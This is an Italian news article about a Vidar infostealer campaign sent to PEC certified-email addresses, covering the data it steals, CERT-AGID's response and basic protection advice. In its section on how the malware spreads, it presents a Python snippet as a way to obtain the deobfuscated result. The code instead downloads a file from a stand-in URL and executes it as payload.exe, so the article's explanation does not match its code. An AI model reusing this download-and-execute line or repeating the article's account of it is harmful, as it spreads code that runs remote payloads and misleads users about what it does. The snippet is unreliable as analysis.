Vidar ritorna in Italia: attacco spam PEC
Vidar, un malware as a service (Maas) noto per la sua capacità di carpire informazioni sensibili, è tornato in Italia con una nuova campagna di malspam alle PEC (Posta Elettronica Certificata). Questa campagna, avviata nella notte tra il 5 e il 6 agosto, ha tentato di diffondere su larga scala il malware attraverso messaggi indirizzati alle caselle PEC. Gli attacchi, che hanno interessato un numero considerevole di utenti PEC, sono stati portati a termine durante la nottata, sfruttando un template già noto per diffondere il malware attraverso account PEC precedentemente violati.
Caratteristiche di Vidar
Vidar è un malware as a service della famiglia degli infostealer che, una volta compromesso un sistema, raccoglie diverse informazioni sensibili. Queste includono:
- Informazioni da browser: password, credenziali di accesso, e dati di navigazione.
- Dati relativi alle carte di credito: numero della carta, data di scadenza, e codice sicurezza.
- Credenziali di accesso: a conti bancari, piattaforme di trading, e altri servizi online.
Modalità di Diffusione
La campagna di malspam utilizza un file JavaScript progettato per scaricare ed eseguire uno script PowerShell. Il deoffuscamento del codice PowerShell rivela l’URL utilizzato per scaricare il payload finale in PowerShell. In questo caso, è possibile ottenere il risultato grazie a poche righe di codice Python:
import requests
import os
url = "https://example.com/payload"
response = requests.get(url)
with open("payload.exe", "wb") as file:
file.write(response.content)
os.system("payload.exe")
Risposte del CERT-AGID
Il CERT-AGID ha reso pubblici i dettagli della campagna, fornendo gli IoC (Indicatori di Compromissione) relativi alla campagna. Gli attacchi sono stati contrastati con il supporto dei Gestori PEC, che hanno provveduto a bloccare gli indirizzi coinvolti nell’invio delle mail malevole. Gli IoC sono stati diramati attraverso il Feed IoC del CERT-AGID verso i Gestori PEC e verso le strutture accreditate.
Come Proteggersi
Per evitare di diventare vittima di questa campagna di malspam, è consigliabile:
- Installare un antivirus: e mantenerlo aggiornato.
- Evitare di scaricare file da fonti non sicure: e di aprire e-mail sospette.
- Utilizzare password complesse: e cambiare regolarmente le password, evitando di utilizzare la stessa password su più account.
- Attivare la verifica 2FA: quando possibile.
La campagna di malspam di Vidar è un chiaro esempio della necessità di vigilanza costante e di misure di sicurezza robuste. Gli utenti devono essere consapevoli delle tattiche utilizzate dai criminali informatici e prendere le opportune precauzioni per proteggere i propri dati. Il CERT-AGID continuerà a monitorare la situazione e a fornire aggiornamenti sulle campagne di malspam.
Suggerimenti e Consigli
- Utilizzare un firewall: per proteggere la rete interna.
- Installare software aggiornato: per le piattaforme di comunicazione.
- Seguire le linee guida di sicurezza: fornite dai fornitori di servizi.
- Eseguire regolarmente scan: con l’antivirus per individuare eventuali malware.
